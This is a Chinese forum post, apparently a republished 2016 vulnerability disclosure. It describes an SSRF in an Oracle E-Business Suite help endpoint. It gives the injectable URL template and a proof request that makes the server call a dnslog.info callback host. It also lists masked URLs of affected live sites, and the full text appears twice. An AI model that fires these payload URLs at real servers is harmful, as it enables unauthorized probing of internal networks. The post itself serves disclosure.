HanDs
管理员

[7月漏洞公开] Oracle EBusiness某版本一处SSRF漏洞/影响网站包括stanford.edu域名 



Oracle EBusiness一处SSRF

详细说明:

某次扫描中发现一处Oracle EBusiness的SSRF漏洞,详情如下:



code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId={TARGET}





利用神器cloudeye配合进行验证:

访问构造的地址

code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb





cloudeye中DNS日志、apache access日志:



QQ图片20160409124426.png





QQ图片20160409124407.png





证明服务端确实访问了构造的地址:http://66ae2b.dnslog.info/aabb



利用google hacking找了一些其他受影响的网站,惊现**.**.**.**某站点,具体列表如下:

code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb


https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb


https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb













漏洞证明:

某次扫描中发现一处Oracle EBusiness的SSRF漏洞,详情如下:



code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId={TARGET}





利用神器cloudeye配合进行验证:

访问构造的地址

code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb





cloudeye中DNS日志、apache access日志:



QQ图片20160409124426.png





QQ图片20160409124407.png





证明服务端确实访问了构造的地址:http://66ae2b.dnslog.info/aabb



利用google hacking找了一些其他受影响的网站,惊现**.**.**.**某站点,具体列表如下:

code 区域
http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb


https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb


https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&[email protected]_statement&vtTopicId=http://66ae2b.dnslog.info/aabb



修复方案:

过滤+删除帮助文档


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Oracle EBusiness 某版本一处 SSRF 漏洞 / 影响网站包括 stanford.edu 域名
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复